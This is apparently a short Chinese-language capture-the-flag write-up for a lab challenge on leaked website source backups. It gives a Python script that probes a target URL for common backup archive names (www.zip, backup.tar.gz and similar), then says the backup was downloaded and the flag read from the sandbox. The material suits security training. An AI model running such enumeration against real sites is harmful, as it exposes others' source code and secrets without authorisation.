• 根据网站提示，可知只要测试出网站源码备份的文件名称即可通过备份内容得出flag，故自制测试脚本

import requests

url=(input("URL:"))
list1=['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
list2=['tar', 'tar.gz', 'zip', 'rar']
for i in list1:
    for j in list2:
        url_f=url+'/'+i+'.'+j
        r=requests.get(url_f)
        if(r.status_code == 200):
            print(url_f)

• 使用脚本得出备份文件名称
  
• 输入URL即可下载zip文件，解压后如下
  
• 分析后，使用http://challenge-9e6e15ec91bb75e5.sandbox.ctfhub.com:10800/flag_3081416043.txt 得出flag